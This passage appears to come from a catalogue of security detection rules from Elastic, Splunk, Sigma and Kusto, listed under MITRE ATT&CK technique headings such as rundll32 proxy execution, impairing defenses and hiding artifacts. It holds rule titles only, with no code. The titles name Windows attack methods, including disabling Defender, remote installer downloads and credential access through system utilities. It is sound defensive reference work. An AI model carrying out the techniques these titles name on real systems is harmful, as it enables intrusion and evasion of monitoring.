- Elastic Mshta Making Network Connections production
- Splunk Mshta spawning Rundll32 OR Regsvr32 Process production
- Splunk MSHTA.exe execution (PowerShell)
- Splunk MSHTA.exe execution (Sysmon)
- Splunk MSHTA.exe execution (Windows Event Log)
- Splunk mshta.exe File Download (PowerShell)
- Splunk mshta.exe File Download (Sysmon)
- Splunk mshta.exe File Download (Windows Event Log)
- Sigma Potential Baby Shark Malware Activity test
- Elastic Potential Execution via FileFix Phishing Attack production
- Elastic Potential Fake CAPTCHA Phishing Attack production
- Sigma Potential LethalHTA Technique Execution test
- Elastic Process Activity via Compiled HTML File production
- Sigma Remotely Hosted HTA File Executed Via Mshta.EXE test
- Elastic Script Execution via Microsoft HTML Application production
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Elastic Service Control Spawned via Script Interpreter production
- Elastic Suspicious .NET Code Compilation production
- Splunk Suspicious Child Process for mshta.exe (Sysmon)
- Splunk Suspicious Child Process for mshta.exe (Windows Event Log)
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious JavaScript Execution Via Mshta.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Sigma Suspicious MSHTA Child Process test
- Splunk Suspicious mshta child process production
- Splunk Suspicious mshta spawn production
- Elastic Suspicious PDF Reader Child Process production
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Windows Command Shell Arguments production
- Elastic Unusual Network Activity from a Windows System Binary production
- Splunk Windows Mshta Execution In Registry production
- Splunk Windows MSHTA Writing to World Writable Path production
- Splunk Windows Process Writing File to World Writable Path production
System Binary Proxy Execution: Msiexec T1218.007 50 rules
- Sigma DllUnregisterServer Function Call Via Msiexec.EXE test
- Elastic Execution of a Downloaded Windows Script production
- Sigma MSI Installation From Web test
- Splunk MSI Installation via Appcert (PowerShell)
- Splunk MSI Installation via Appcert (Sysmon)
- Splunk MSI Installation via Appcert (Windows Event Log)
- Splunk Msiexec Abuse (Sysmon)
- Splunk Msiexec Abuse (Windows Event Log)
- Splunk MSIExec Install MSI File (Sysmon)
- Splunk MSIExec Install MSI File (Windows Event Log)
- Sigma Msiexec Quiet Installation test
- Elastic MsiExec Service Child Process With Network Connection production
- Sigma MsiExec Web Install test
- Splunk MSIExec.exe Execution (Sysmon)
- Splunk MSIExec.exe Execution (Windows Event Log)
- Sigma Msiexec.EXE Initiated Network Connection Over HTTP test
- Sigma Obfuscated PowerShell MSI Install via WindowsInstaller COM experimental
- Elastic Persistence via a Windows Installer production
- Elastic Potential Escalation via Vulnerable MSI Repair production
- Elastic Potential Remote File Execution via MSIEXEC production
- Elastic Potential Remote Install via MsiExec production
- Sigma PowerShell WMI Win32_Product Install MSI test
- Splunk Remote .msi Installation (PowerShell)
- Splunk Remote .msi Installation (PowerShell)
- Splunk Remote .msi Installation (Sysmon)
- Splunk Remote .msi Installation (Sysmon)
- Splunk Remote .msi Installation (Windows Event Log)
- Splunk Remote .msi Installation (Windows Event Log)
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Execution via MSIEXEC production
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Sigma Suspicious MsiExec Embedding Parent test
- Sigma Suspicious Msiexec Execute Arbitrary DLL test
- Sigma Suspicious Msiexec Quiet Install From Remote Location test
- Splunk Suspicious Parent Process for msiexec.exe (Sysmon)
- Splunk Suspicious Parent Process for msiexec.exe (Windows Event Log)
- Elastic Suspicious ScreenConnect Client Child Process production
- Splunk Uninstall App Using MsiExec production
- Elastic Unusual Network Activity from a Windows System Binary production
- Splunk Windows HTTP Network Communication From MSIExec production
- Elastic Windows Installer with Suspicious Properties production
- Splunk Windows MSI Rollback Script Deleted By Non-Msiexec Process production
- Splunk Windows MSIExec DLLRegisterServer production
- Splunk Windows MsiExec HideWindow Rundll32 Execution production
- Splunk Windows MSIExec Remote Download production
- Splunk Windows MSIExec Spawn Discovery Command production
- Splunk Windows MSIExec Spawn WinDBG production
- Splunk Windows MSIExec Unregister DLLRegisterServer production
System Binary Proxy Execution: Odbcconf T1218.008 17 rules
- Sigma Driver/DLL Installation Via Odbcconf.EXE test
- Sigma New DLL Registered Via Odbcconf.EXE test
- Sigma Odbcconf.EXE Suspicious DLL Location test
- Sigma Potentially Suspicious DLL Registered Via Odbcconf.EXE test
- Sigma Response File Execution Via Odbcconf.EXE test
- Sigma Suspicious Driver/DLL Installation Via Odbcconf.EXE test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious Response File Execution Via Odbcconf.EXE test
- Sigma Uncommon Child Process Spawned By Odbcconf.EXE test
- Elastic Unusual Network Activity from a Windows System Binary production
- Elastic Unusual Process Network Connection production
- Splunk Windows Odbcconf Hunting production
- Splunk Windows Odbcconf Load DLL production
- Splunk Windows Odbcconf Load Response File production
System Binary Proxy Execution: Regsvcs/Regasm T1218.009 17 rules
- Elastic Delayed Execution via Ping production
- Splunk Detect Regasm Spawning a Process production
- Splunk Detect Regasm with Network Connection production
- Splunk Detect Regasm with no Command Line Arguments production
- Splunk Detect Regsvcs Spawning a Process production
- Splunk Detect Regsvcs with Network Connection production
- Splunk Detect Regsvcs with No Command Line Arguments production
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Network Connection via Registration Utility production
- Sigma Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location test
- Sigma Potentially Suspicious Execution Of Regasm/Regsvcs With Uncommon Extension test
- Sigma RegAsm.EXE Execution Without CommandLine Flags or Files experimental
- Sigma RegAsm.EXE Initiating Network Connection To Public IP test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
System Binary Proxy Execution: Regsvr32 T1218.010 48 rules
- Elastic Delayed Execution via Ping production
- Splunk Detect Regsvr32 Application Control Bypass production
- Sigma DNS Query Request By Regsvr32.EXE test
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of Persistent Suspicious Program production
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Splunk Malicious InProcServer32 Modification production
- Sigma Network Connection Initiated By Regsvr32.EXE test
- Elastic Network Connection via Registration Utility production
- Sigma Potential APT-C-12 BlueMushroom DLL Load Activity Via Regsvr32 test
- Elastic Potential Command and Control via Internet Explorer production
- Sigma Potential EmpireMonkey Activity test
- Sigma Potential Regsvr32 Commandline Flag Anomaly test
- Sigma Potentially Suspicious Child Process Of Regsvr32 test
- Sigma Potentially Suspicious Regsvr32 HTTP IP Pattern test
- Sigma Potentially Suspicious Regsvr32 HTTP/FTP Pattern test
- Sigma Regsvr32 DLL Execution With Suspicious File Extension test
- Splunk regsvr32 Execution (PowerShell)
- Splunk regsvr32 Execution (Sysmon)
- Splunk regsvr32 Execution (Windows Event Log)
- Sigma Regsvr32 Execution From Highly Suspicious Location test
- Sigma Regsvr32 Execution From Potential Suspicious Location test
- Splunk regsvr32 Referencing Unusual Paths (Sysmon)
- Splunk regsvr32 Referencing Unusual Paths (Windows Event Log)
- Kusto Regsvr32 Rundll32 Image Loads Abnormal Extension available
- Kusto Regsvr32 Rundll32 with Anomalous Parent Process available
- Splunk Regsvr32 Silent and Install Param Dll Loading production
- Splunk Regsvr32 with Known Silent Switch Cmdline production
- Sigma Scripting/CommandLine Process Spawned Regsvr32 test
- Elastic Service Control Spawned via Script Interpreter production
- Elastic Suspicious .NET Code Compilation production
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious HH.EXE Execution test
- Elastic Suspicious JetBrains TeamCity Child Process production
- Sigma Suspicious Microsoft Office Child Process test
- Elastic Suspicious MS Office Child Process production
- Elastic Suspicious MS Outlook Child Process production
- Elastic Suspicious PDF Reader Child Process production
- Sigma Suspicious Regsvr32 Execution From Remote Share test
- Splunk Suspicious Regsvr32 Register Suspicious Path production
- Elastic Suspicious Windows Command Shell Arguments production
- Sigma Suspicious WMIC Execution Via Office Process test
- Sigma Suspicious WmiPrvSE Child Process test
- Sigma Unsigned DLL Loaded by Windows Utility test
- Elastic Unusual Network Activity from a Windows System Binary production
- Splunk Windows IOBit Unlocker Extension DLL Registration via Regsvr32 production
- Splunk Windows Regsvr32 Renamed Binary production
System Binary Proxy Execution: Rundll32 T1218.011 121 rules
- Sigma APT29 2018 Phishing Campaign CommandLine Indicators stable
- Sigma APT29 2018 Phishing Campaign File Indicators stable
- Sigma Bad Opsec Defaults Sacrificial Processes With Improper Arguments test
- Sigma CobaltStrike Load by Rundll32 test
- Sigma Code Execution via Pcwutl.dll test
- Elastic Command Shell Activity Started via RunDLL32 production
- Splunk Control_RunDLL Call from Command Line (Sysmon)
- Splunk Control_RunDLL Call from Command Line (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Sigma DLL Call by Ordinal Via Rundll32.EXE stable
- Splunk DLL Called with RS32 (PowerShell)
- Splunk DLL Called with RS32 (Sysmon)
- Splunk DLL Called with RS32 (Windows Event Log)
- Splunk DLL Called with Uncommon Function (PowerShell)
- Splunk DLL Called with Uncommon Function (Sysmon)
- Splunk DLL Called with Uncommon Function (Windows Event Log)
- Splunk DLL Execution from Uncommon Process (PowerShell)
- Splunk DLL Execution from Uncommon Process (Sysmon)
- Splunk DLL Execution from Uncommon Process (Windows Event Log)
- Splunk DLLRegisterServer Called from Command Line (PowerShell)
- Splunk DLLRegisterServer Called from Command Line (Sysmon)
- Splunk DLLRegisterServer Called from Command Line (Windows Event Log)
- Sigma Equation Group DLL_U Export Function Load stable
- Sigma EvilNum APT Golden Chickens Deployment Via OCX Files test
- Splunk Executable Process from Suspicious Folder (PowerShell)
- Splunk Executable Process from Suspicious Folder (Sysmon)
- Splunk Executable Process from Suspicious Folder (Windows Event Log)
- Elastic Execution from Unusual Directory - Command Line production
- Elastic Execution of Persistent Suspicious Program production
- Elastic Execution via Microsoft DotNet ClickOnce Host production
- Elastic File or Directory Deletion Command production
- Sigma Fireball Archer Install test
- Sigma HackTool - F-Secure C3 Load by Rundll32 test
- Sigma HackTool - RedMimicry Winnti Playbook Execution test
- Sigma HTML Help HH.EXE Suspicious Child Process test
- Sigma IcedID Malware Suspicious Single Digit DLL Execution Via Rundll32 test
- Sigma Kapeka Backdoor Execution Via RunDLL32.EXE test
- Sigma Kapeka Backdoor Loaded Via Rundll32.EXE test
- Sigma NotPetya Ransomware Activity test
- Sigma Outbound Network Connection To Public IP Via Winlogon test
- Sigma Potential Bumblebee Remote Thread Creation test
- Elastic Potential Command and Control via Internet Explorer production
- Elastic Potential Credential Access via Renamed COM+ Services DLL production
- Elastic Potential Credential Access via Windows Utilities production
- Sigma Potential Emotet Rundll32 Execution test
- Elastic Potential Local NTLM Relay via HTTP production
- Sigma Potential PowerShell Execution Via DLL test
- Elastic Potential Protocol Tunneling via Yuze production
- Sigma Potential Raspberry Robin CPL Execution Activity test
- Sigma Potentially Suspicious Rundll32 Activity test
- Sigma Potentially Suspicious Rundll32.EXE Execution of UDL File test
- Sigma Process Access via TrolleyExpress Exclusion test
- Kusto Regsvr32 Rundll32 Image Loads Abnormal Extension available
- Kusto Regsvr32 Rundll32 with Anomalous Parent Process available
- Sigma Remote Thread Creation Via PowerShell In Uncommon Target test
- Sigma Rhadamanthys Stealer Module Launch Via Rundll32.EXE test
- Splunk RunDLL Loading DLL By Ordinal production
- Splunk Rundll32 Command Line (PowerShell)
- Splunk Rundll32 Command Line (Sysmon)
- Splunk Rundll32 Command Line (Windows Event Log)
- Splunk Rundll32 Control RunDLL Hunt production
- Splunk Rundll32 Control RunDLL World Writable Directory production
- Splunk Rundll32 DNSQuery production
- Sigma Rundll32 Execution With Uncommon DLL Extension test
- Sigma Rundll32 InstallScreenSaver Execution test
- Sigma Rundll32 Internet Connection test
- Splunk Rundll32 LockWorkStation production
- Splunk Rundll32 Process Creating Exe Dll Files production
- Sigma RunDLL32 Spawning Explorer test
- Splunk Rundll32 Suspicious Command Line (PowerShell)
- Splunk Rundll32 Suspicious Command Line (Sysmon)
- Splunk Rundll32 Suspicious Command Line (Windows Event Log)
- Splunk rundll32 Suspicious Parent Process (Sysmon)
- Splunk rundll32 Suspicious Parent Process (Windows Event Log)
- Sigma Rundll32 UNC Path Execution test
- Splunk Rundll32 with no Command Line Arguments with Network production
- Splunk rundll32 with No DLL in Command Line (Sysmon)
- Splunk rundll32 with No DLL in Command Line (Windows Event Log)
- Splunk Rundll32.exe as Parent Process (Sysmon)
- Splunk Rundll32.exe as Parent Process (Windows Event Log)
- Splunk rundll32.exe Executing DLL from Non-standard Directory (PowerShell)
- Splunk rundll32.exe Executing DLL from Non-standard Directory (Sysmon)
- Splunk rundll32.exe Executing DLL from Non-standard Directory (Windows Event Log)
- Sigma SCR File Write Event test
- Sigma ScreenSaver Registry Key Set test
- Elastic Script Execution via Microsoft HTML Application production
- Elastic Service Control Spawned via Script Interpreter production
- Sigma Shell32 DLL Execution in Suspicious Directory test
- Sigma Sofacy Trojan Loader Activity test
- Elastic Suspicious .NET Code Compilation production
- Sigma Suspicious Control Panel DLL Load test
- Elastic Suspicious Execution from a Mounted Device production
- Elastic Suspicious Execution from VS Code Extension production
- Elastic Suspicious Explorer Child Process production
- Sigma Suspicious HH.EXE Execution test
- Splunk Suspicious IcedID Rundll32 Cmdline production
- Elastic Suspicious JetBrains TeamCity Child Process production
- Elastic Suspicious Microsoft HTML Application Child Process production
- Elastic Suspicious MS Office Child Process production
- Sigma Suspicious Rundll32 Activity Invoking Sys File test
- Splunk Suspicious Rundll32 dllregisterserver production
- Sigma Suspicious Rundll32 Execution With Image Extension test
- Splunk Suspicious Rundll32 no Command Line Arguments production
- Splunk Suspicious Rundll32 PluginInit production
- Sigma Suspicious Rundll32 Setupapi.dll Activity test
- Splunk Suspicious Rundll32 StartW production
- Elastic Suspicious ScreenConnect Client Child Process production
- Elastic Suspicious Shell Execution via Velociraptor production
- Sigma Suspicious ShellExec_RunDLL Call Via Ordinal test
- Elastic Suspicious SolarWinds Web Help Desk Java Module Load or Child Process production
- Sigma Unsigned DLL Loaded by Windows Utility test
- Elastic Unusual Child Processes of RunDLL32 production
- Elastic Unusual Network Connection via RunDLL32 production
- Splunk Windows Application Whitelisting Bypass Attempt via Rundll32 production
- Splunk Windows LOLBAS Executed As Renamed File production
- Splunk Windows LOLBAS Executed Outside Expected Path production
- Splunk Windows Rundll32 Apply User Settings Changes production
- Splunk Windows Rundll32 Load DLL in Temp Dir production
- Splunk Windows Rundll32 with Non-Standard File Extension production
- Elastic Windows Server Update Service Spawning Suspicious Processes production
- Sigma ZxShell Malware test
System Binary Proxy Execution: Verclsid T1218.012 1 rule
- Splunk Verclsid CLSID Execution production
System Binary Proxy Execution: Mavinject T1218.013 3 rules
- Sigma Mavinject Inject DLL Into Running Process test
- Sigma Renamed Mavinject.EXE Execution test
- Splunk Windows Binary Proxy Execution Mavinject DLL Injection production
System Binary Proxy Execution: MMC T1218.014 22 rules
- Splunk .msc Executed from Unusual Location (Sysmon)
- Splunk .msc Executed from Unusual Location (Windows Event Log)
- Splunk Group Policy Editor Execution (PowerShell)
- Splunk Group Policy Editor Execution (Sysmon)
- Splunk Group Policy Editor Execution (Windows Event Log)
- Elastic Incoming DCOM Lateral Movement with MMC production
- Elastic Microsoft Management Console File from Unusual Path production
- Sigma MMC Executing Files with Reversed Extensions Using RTLO Abuse experimental
- Sigma MMC Loading Script Engines DLLs experimental
- Splunk Mmc LOLBAS Execution Process Spawn production
- Splunk Possible Lateral Movement PowerShell Spawn production
- Kusto Process Injection Initiated By MMC
- Kusto Script Interpreter Loading DotNet Assembly From Memory
- Splunk Suspicious Execution via Microsoft Common Console (Sysmon)
- Splunk Suspicious Execution via Microsoft Common Console (Windows Event Log)
- Kusto Suspicious MSC File Launched
- Splunk UAC Bypass MMC Load Unsigned Dll production
- Elastic UAC Bypass via Windows Firewall Snap-In Hijack production
- Elastic Unusual Execution via Microsoft Common Console File production
- Splunk Windows Execution of Microsoft MSC File In Suspicious Path production
- Splunk Windows GrimResource - MMC Process Accessing APDS DLL production
- Splunk Windows Mock Trusted Directory MSC File Creation production
XSL Script Processing T1220 14 rules
- Elastic Delayed Execution via Ping production
- Splunk Msxsl Execution (EDR)
- Splunk Msxsl Execution (Sysmon)
- Splunk Msxsl Execution (Windows Event Log)
- Sigma Msxsl.EXE Execution test
- Elastic Network Connection via MsXsl production
- Sigma Potential Remote SquiblyTwo Technique Execution test
- Sigma Remote XSL Execution Via Msxsl.EXE test
- Elastic Remote XSL Script Execution via COM production
- Elastic Suspicious WMIC XSL Script Execution production
- Sigma WMIC Loading Scripting Libraries test
- Splunk WMIC XSL Execution via URL production
- Sigma XSL Script Execution Via WMIC.EXE test
- Splunk XSL Script Execution With WMIC production
Template Injection T1221 1 rule
Virtualization/Sandbox Evasion T1497 14 rules
- Splunk Common Recon Commands in Short Burst (Sysmon)
- Splunk Common Recon Commands in Short Burst (Windows Event Log)
- Elastic Delayed Execution via Ping production
- Splunk Headless Browser Usage production
- Splunk Ping Sleep Batch Command production
- Sigma Powershell Detect Virtualization Environment test
- Splunk Windows Chromium Browser Launched with Small Window Size production
- Splunk Windows Chromium Browser No Security Sandbox Process production
- Splunk Windows Chromium Browser with Custom User Data Directory production
- Splunk Windows Chromium process Launched with Disable Popup Blocking production
- Splunk Windows Chromium Process Launched with Logging Disabled production
- Splunk Windows Chromium Process with Disabled Extensions production
- Splunk Windows Time Based Evasion production
- Splunk Windows Time Based Evasion via Choice Exec production
Virtualization/Sandbox Evasion: Time Based Checks T1497.003 4 rules
- Elastic Delayed Execution via Ping production
- Splunk Ping Sleep Batch Command production
- Splunk Windows Time Based Evasion production
- Splunk Windows Time Based Evasion via Choice Exec production
Pre-OS Boot T1542 8 rules
- Sigma Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE test
- Sigma UEFI Persistence Via Wpbbin - FileCreation test
- Sigma UEFI Persistence Via Wpbbin - ProcessCreation test
- Splunk Windows EFI Bootloader File Modification production
- Splunk Windows EFI Volume Mount Attempt Via Mountvol production
- Splunk Windows Registry BootExecute Modification production
- Splunk Windows Suspicious File in EFI Volume production
- Splunk Windows WinLogon with Public Network Connection production
Pre-OS Boot: System Firmware T1542.001 3 rules
- Sigma UEFI Persistence Via Wpbbin - FileCreation test
- Sigma UEFI Persistence Via Wpbbin - ProcessCreation test
- Splunk Windows Suspicious File in EFI Volume production
Pre-OS Boot: Bootkit T1542.003 3 rules
- Sigma Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXE test
- Splunk Windows EFI Bootloader File Modification production
- Splunk Windows WinLogon with Public Network Connection production
Impair Defenses T1562 92 rules
- Sigma Audit policy disabled by command line experimental
- Sigma Audit policy disabled by command line experimental
- Elastic Clearing Windows Event Logs production
- Splunk Defender Registry Values Modified (Sysmon)
- Splunk Defender Registry Values Modified (Windows Event Log)
- Kusto Detect Windows Allow Firewall Rule Addition/Modification available
- Kusto Detect Windows Update Disabled from Registry available
- Kusto Dev-0270 Malicious Powershell usage available
- Kusto Disable or Modify Windows Defender available
- Elastic Disable Windows Event and Security Logs Using Built-in Tools production
- Elastic Disable Windows Firewall Rules via Netsh production
- Elastic Disabling Lsa Protection via Registry Modification production
- Kusto Disabling Security Services via Registry available
- Elastic Disabling User Account Control via Registry Modification production
- Elastic Disabling Windows Defender Security Settings via PowerShell production
- Elastic DNS Global Query Block List Modified or Disabled production
- Elastic DNS-over-HTTPS Enabled via Registry production
- Kusto Doppelpaymer Stop Services available
- Elastic Enable Host Network Discovery via Netsh production
- Splunk ETW Trace Provider Modified - PowerShell (PowerShell)
- Sigma Event log deactivation or size reduction (command) experimental
- Sigma Firewall deactivation (deprecated command) experimental
- Sigma Firewall deactivation (firewall) experimental
- Sigma Firewall deactivation (modern command) experimental
- Sigma Firewall deactivation (PowerShell) experimental
- Sigma Firewall rule added using PowerShell or CMD experimental
- Sigma Firewall rule any/any created experimental
- Sigma Firewall rule creation (command) experimental
- Elastic IIS HTTP Logging Disabled production
- Kusto Imminent Ransomware available
- Elastic Kerberos Pre-authentication Disabled for User production
- Elastic Local Account TokenFilter Policy Disabled production
- Sigma Microsoft Defender critical security components disabled (command) experimental
- Sigma Microsoft Defender critical security components disabled (PowerShell) experimental
- Sigma Microsoft Defender default action changed to allow any threat (command) experimental
- Sigma Microsoft Defender default action changed to allow any threat (PowerShell) experimental
- Sigma Microsoft Defender real time protection failure (native) experimental
- Sigma Microsoft Defender security components disabled (command) experimental
- Sigma Microsoft Defender security components disabled (PowerShell) experimental
- Sigma Microsoft Defender service components status disabled (Registry via Sysmon) experimental
- Sigma Microsoft Defender service deactivation attempt (command) experimental
- Sigma Microsoft Defender threat exclusion added (native) experimental
- Sigma Microsoft Defender threat exclusion added (PowerShell) experimental
- Elastic Microsoft Windows Defender Tampering production
- Elastic Modification of AmsiEnable Registry Key production
- Splunk Modify Windows Defender (EDR)
- Splunk Modify Windows Defender (PowerShell)
- Splunk Modify Windows Defender (Sysmon)
- Splunk Modify Windows Defender (Windows Event Log)
- Kusto MosaicLoader available
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma NTLM downgrade attack (Reg via SYSMON) experimental
- Sigma OCSP responder auditing settings changed or disabled experimental
- Sigma OpenSSH server firewall configuration on Windows (command) experimental
- Sigma OpenSSH server firewall configuration on Windows (firewall) experimental
- Sigma OpenSSH server firewall configuration on Windows (PowerShell) experimental
- Elastic Potential Evasion via Filter Manager production
- Elastic Potential Evasion via Windows Filtering Platform production
- Elastic Potential NetNTLMv1 Downgrade Attack production
- Elastic Potential RemoteMonologue Attack production
- Elastic PowerShell Script Block Logging Disabled production
- YARA-L Reg Add Suspicious Paths
- Elastic Remote Desktop Enabled in Windows Firewall by Netsh production
- Kusto Scheduled Task Hide available
- Elastic Scheduled Tasks AT Command Enabled production
- Kusto Security Service Registry ACL Modification
- Elastic Sensitive Audit Policy Sub-Category Disabled production
- Elastic Service Disabled via Registry Modification production
- Splunk Service Stop Commands (PowerShell)
- Splunk Service Stop Commands (Sysmon)
- Splunk Service Stop Commands (Windows Event Log)
- Elastic SolarWinds Process Disabling Services via Registry production
- Kusto Starting or Stopping HealthService to Avoid Detection available
- Kusto Stopping multiple processes using taskkill available
- Sigma Wdigest authentication enabled (Reg via command) experimental
- Sigma Wdigest authentication enabled (registry) experimental
- Splunk WFP Blocked Connection from EDR Agent (Windows Event Log)
- Splunk WFP Filter and Provider Changed (Windows Event Log)
- Splunk Windows - Service Stop (PowerShell)
- Splunk Windows - Service Stop (Windows Event Log)
- Splunk Windows Defender Disabled Detection (EDR)
- Splunk Windows Defender Disabled Detection (PowerShell)
- Splunk Windows Defender Disabled Detection (Sysmon)
- Splunk Windows Defender Disabled Detection (Windows Event Log)
- Elastic Windows Defender Disabled via Registry Modification production
- Elastic Windows Defender Exclusions Added via PowerShell production
- Splunk Windows Firewall Disabled (PowerShell)
- Splunk Windows Firewall Disabled (Sysmon)
- Splunk Windows Firewall Disabled (Windows Event Log)
- Elastic Windows Firewall Disabled via PowerShell production
- Splunk Windows Firewall Rule Creation (PowerShell)
- Splunk Windows Firewall Rule Creation (Windows Event Log)
Impair Defenses: Disable or Modify Tools T1562.001 42 rules
- Splunk Defender Registry Values Modified (Sysmon)
- Splunk Defender Registry Values Modified (Windows Event Log)
- Kusto Disable or Modify Windows Defender available
- Elastic Disabling Lsa Protection via Registry Modification production
- Elastic Disabling User Account Control via Registry Modification production
- Elastic Disabling Windows Defender Security Settings via PowerShell production
- Elastic DNS Global Query Block List Modified or Disabled production
- Sigma Microsoft Defender critical security components disabled (command) experimental
- Sigma Microsoft Defender critical security components disabled (PowerShell) experimental
- Sigma Microsoft Defender default action changed to allow any threat (command) experimental
- Sigma Microsoft Defender default action changed to allow any threat (PowerShell) experimental
- Sigma Microsoft Defender real time protection failure (native) experimental
- Sigma Microsoft Defender security components disabled (command) experimental
- Sigma Microsoft Defender security components disabled (PowerShell) experimental
- Sigma Microsoft Defender service components status disabled (Registry via Sysmon) experimental
- Sigma Microsoft Defender service deactivation attempt (command) experimental
- Sigma Microsoft Defender threat exclusion added (native) experimental
- Sigma Microsoft Defender threat exclusion added (PowerShell) experimental
- Elastic Microsoft Windows Defender Tampering production
- Elastic Modification of AmsiEnable Registry Key production
- Splunk Modify Windows Defender (EDR)
- Splunk Modify Windows Defender (PowerShell)
- Splunk Modify Windows Defender (Sysmon)
- Splunk Modify Windows Defender (Windows Event Log)
- Elastic Potential Evasion via Filter Manager production
- Elastic Potential Evasion via Windows Filtering Platform production
- YARA-L Reg Add Suspicious Paths
- Elastic Scheduled Tasks AT Command Enabled production
- Elastic Service Disabled via Registry Modification production
- Splunk Service Stop Commands (PowerShell)
- Splunk Service Stop Commands (Sysmon)
- Splunk Service Stop Commands (Windows Event Log)
- Elastic SolarWinds Process Disabling Services via Registry production
- Kusto Starting or Stopping HealthService to Avoid Detection available
- Splunk Windows - Service Stop (PowerShell)
- Splunk Windows - Service Stop (Windows Event Log)
- Splunk Windows Defender Disabled Detection (EDR)
- Splunk Windows Defender Disabled Detection (PowerShell)
- Splunk Windows Defender Disabled Detection (Sysmon)
- Splunk Windows Defender Disabled Detection (Windows Event Log)
- Elastic Windows Defender Disabled via Registry Modification production
- Elastic Windows Defender Exclusions Added via PowerShell production
Impair Defenses: Disable Windows Event Logging T1562.002 9 rules
- Sigma Audit policy disabled by command line experimental
- Sigma Audit policy disabled by command line experimental
- Elastic Clearing Windows Event Logs production
- Elastic Disable Windows Event and Security Logs Using Built-in Tools production
- Sigma Event log deactivation or size reduction (command) experimental
- Elastic IIS HTTP Logging Disabled production
- Sigma OCSP responder auditing settings changed or disabled experimental
- Elastic PowerShell Script Block Logging Disabled production
- Elastic Sensitive Audit Policy Sub-Category Disabled production
Impair Defenses: Disable or Modify System Firewall T1562.004 20 rules
- Elastic Disable Windows Firewall Rules via Netsh production
- Elastic Enable Host Network Discovery via Netsh production
- Sigma Firewall deactivation (deprecated command) experimental
- Sigma Firewall deactivation (firewall) experimental
- Sigma Firewall deactivation (modern command) experimental
- Sigma Firewall deactivation (PowerShell) experimental
- Sigma Firewall rule added using PowerShell or CMD experimental
- Sigma Firewall rule any/any created experimental
- Sigma Firewall rule creation (command) experimental
- Sigma OpenSSH server firewall configuration on Windows (command) experimental
- Sigma OpenSSH server firewall configuration on Windows (firewall) experimental
- Sigma OpenSSH server firewall configuration on Windows (PowerShell) experimental
- Elastic Potential Evasion via Windows Filtering Platform production
- Elastic Remote Desktop Enabled in Windows Firewall by Netsh production
- Splunk Windows Firewall Disabled (PowerShell)
- Splunk Windows Firewall Disabled (Sysmon)
- Splunk Windows Firewall Disabled (Windows Event Log)
- Elastic Windows Firewall Disabled via PowerShell production
- Splunk Windows Firewall Rule Creation (PowerShell)
- Splunk Windows Firewall Rule Creation (Windows Event Log)
Impair Defenses: Indicator Blocking T1562.006 5 rules
- Elastic Disable Windows Event and Security Logs Using Built-in Tools production
- Splunk ETW Trace Provider Modified - PowerShell (PowerShell)
- Elastic Sensitive Audit Policy Sub-Category Disabled production
- Elastic Windows Defender Disabled via Registry Modification production
- Elastic Windows Defender Exclusions Added via PowerShell production
Impair Defenses: Downgrade Attack T1562.010 3 rules
- Elastic Network-Level Authentication (NLA) Disabled production
- Sigma NTLM downgrade attack (Reg via SYSMON) experimental
- Elastic Potential NetNTLMv1 Downgrade Attack production
Hide Artifacts T1564 96 rules
- Elastic Adding Hidden File Attribute via Attrib production
- Elastic Alternate Data Stream Creation/Execution at Volume Root Directory production
- Sigma Atomic MacOS Stealer - Persistence Indicators experimental
- Splunk Attrib.exe Metasploit File Dropper (EDR)
- Splunk Attrib.exe Metasploit File Dropper (Sysmon)
- Splunk Attrib.exe Metasploit File Dropper (Windows Event Log)
- Sigma Browser Execution In Headless Mode test
- Sigma Cmd Launched with Hidden Start Flags to Suspicious Targets experimental
- Sigma CrashControl CrashDump Disabled test
- Elastic Creation of a Hidden Local User Account production
- Sigma Detection of default a Windows host name in login attempts experimental
- Splunk Disable Show Hidden Files production
- Sigma Displaying Hidden Files Feature Disabled test
- Splunk Esentutl Execution (PowerShell)
- Splunk Esentutl Execution (Sysmon)
- Splunk Esentutl Execution (Windows Event Log)
- Sigma Execute From Alternate Data Streams test
- Splunk Expand.exe Execution (PowerShell)
- Splunk Expand.exe Execution (Sysmon)
- Splunk Expand.exe Execution (Windows Event Log)
- Sigma Exports Registry Key To an Alternate Data Stream test
- Sigma Extended rights backdoor obfuscation (via localizationDisplayId attribute) experimental
- Kusto Fake computer account created
- Sigma File Download with Headless Browser test
- Elastic File Staged in Root Folder of Recycle Bin production
- Sigma HackTool - Covenant PowerShell Launcher test
- Sigma HackTool Named File Stream Created test
- Splunk Headless Browser Mockbin or Mocky Request production
- Splunk Headless Browser Usage production
- Sigma Hidden Executable In NTFS Alternate Data Stream test
- Splunk Hidden User Created - Windows (Sysmon)
- Splunk Hidden User Created - Windows (Windows Event Log)
- Sigma Hiding Files with Attrib.exe test
- Sigma Hiding User Account Via SpecialAccounts Registry Key test
- Sigma Hiding User Account Via SpecialAccounts Registry Key - CommandLine test
- Sigma Inbox Rules Creation Or Update Activity Via ExchangePowerShell Cmdlet experimental
- Kusto Ingress Tool Transfer - Certutil available
- Sigma Insensitive Subfolder Search Via Findstr.EXE test
